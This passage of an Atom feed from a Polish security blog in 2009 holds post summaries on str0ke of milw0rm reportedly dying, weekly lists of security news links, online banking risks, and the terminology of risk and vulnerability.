Many of us have wondered where str0ke has been and why #milw0rm has not been updated in a good while. I recently was informed that #str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.Sadly....I&#39;ve just received information that str0ke @ milw0rm has passed away</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/7090977670148452698/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/str0ke-nie-zyje-milw0rm.html#comment-form' title='Komentarze (2)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/7090977670148452698'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/7090977670148452698'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/str0ke-nie-zyje-milw0rm.html' title='str0ke nie żyje, milw0rm'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-253195183820213622</id><published>2009-11-02T15:40:00.000-08:00</published><updated>2009-11-02T15:40:39.198-08:00</updated><title type='text'>(in)security tygodnia</title><summary type="text">Witam ponownie, zgodnie z zapowiedzią kolejna porcja ciekawostek:



   http://blog.itsecurityexpert.co.uk/2009/11/how-secure-is-your-uk-online-banking.html - odnośnie ostatniego wpisu

  
   http://www.heise-online.pl/security/news/item/Hasla-wielowyrazowe-w-systemie-platnosci-Amazona-846478.html

  
   http://www.securitum.pl/baza-wiedzy/publikacje/zdalny-root-na-routerze-soho

  
   http://</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/253195183820213622/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/insecurity-tygodnia.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/253195183820213622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/253195183820213622'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/11/insecurity-tygodnia.html' title='(in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-1273673411963955047</id><published>2009-10-27T10:33:00.000-07:00</published><updated>2009-10-27T10:38:01.845-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="bankowosc"/><category scheme="http://www.blogger.com/atom/ns#" term="internetowa"/><category scheme="http://www.blogger.com/atom/ns#" term="klient"/><category scheme="http://www.blogger.com/atom/ns#" term="tokeny"/><title type='text'>nie-Bezpieczenstwo w bankowości internetowej.</title><summary type="text">Przymierzałem się do napisania notki odnośnie w/w tematu, ale Przemysław Skowron zrobił to wcześniej na swoim blogu&amp;nbsp;:)

Nie zamierzam rezygnować z wpisu, więc...

Raport czytało się przyjemnie, ale tak jak wspomniał kolega P. Skowron, również podszedłbym do sprawy bezpieczeństwa w bankowości internetowej trochę z innej strony.

Załóżmy, że klient posiadający działalność gospodarczą posiada </summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/1273673411963955047/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/nie-bezpieczenstwo-w-bankowosci.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/1273673411963955047'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/1273673411963955047'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/nie-bezpieczenstwo-w-bankowosci.html' title='nie-Bezpieczenstwo w bankowości internetowej.'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-1324685175066485508</id><published>2009-10-27T03:48:00.000-07:00</published><updated>2009-10-27T03:49:09.604-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="(in)security"/><category scheme="http://www.blogger.com/atom/ns#" term="adresy"/><category scheme="http://www.blogger.com/atom/ns#" term="ciekawe"/><category scheme="http://www.blogger.com/atom/ns#" term="linki"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="tygodnia"/><title type='text'>(in)security tygodnia</title><summary type="text">Postanowiłem, co tydzień we wtorek, dzielić się z wami ciekawostkami z świata (in)security. Spośród setek informacji z różnych portafi wybrałem, moim zdaniem, te najciekawsze. Miłej lektury ;)


http://www.readwriteweb.com/archives/android_tor.php

http://pentestit.com/2009/10/26/dirsnatch-check-directory-listings-web-root/


http://isc.sans.org/diary.html?storyid=7450


http://rcpmag.com/</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/1324685175066485508/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/insecurity-tygodnia.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/1324685175066485508'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/1324685175066485508'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/insecurity-tygodnia.html' title='(in)security tygodnia'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-3575835683231388839</id><published>2009-10-09T05:40:00.000-07:00</published><updated>2009-10-09T08:32:25.238-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="podatnosci"/><category scheme="http://www.blogger.com/atom/ns#" term="ryzyko"/><category scheme="http://www.blogger.com/atom/ns#" term="xss"/><category scheme="http://www.blogger.com/atom/ns#" term="zagrozenie"/><title type='text'>ryzyko podatność skutek zagrożenie błąd...</title><summary type="text">Podczas ostatniej konferencji (GigaCon BIN- Bezpieczenstwo i niezawodnosc) miałem możliwość wziąć udział w bardzo ciekawym wykładzie. Pani X (niestety nie pamiętam nazwiska, jeżeli ktoś był i zanotował to proszę o kontakt) rozpoczęła wykład od wytłumaczenia różnicy między zagrożeniem, ryzykiem, podatnością a skutkiem. Okazuje się, że wiele osób &amp;nbsp;myli w/ w pojęcia. Wyjaśniono, że:


- </summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/3575835683231388839/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/ryzyko-podatnosc-skutek-zagrozenie-bad.html#comment-form' title='Komentarze (1)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3575835683231388839'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/3575835683231388839'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/ryzyko-podatnosc-skutek-zagrozenie-bad.html' title='ryzyko podatność skutek zagrożenie błąd...'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6422406678944733222.post-9022031829406533933</id><published>2009-10-08T17:51:00.000-07:00</published><updated>2009-10-08T17:51:06.714-07:00</updated><title type='text'>A jednak</title><summary type="text">Witam wszystkich. Zlamalem sie, zalozylem bloga :) Znajdziecie tu:
...czas pokaze</summary><link rel='replies' type='application/atom+xml' href='http://thinklikeninja.blogspot.com/feeds/9022031829406533933/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/jednak.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/9022031829406533933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6422406678944733222/posts/default/9022031829406533933'/><link rel='alternate' type='text/html' href='http://thinklikeninja.blogspot.com/2009/10/jednak.html' title='A jednak'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/01024402538869594204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>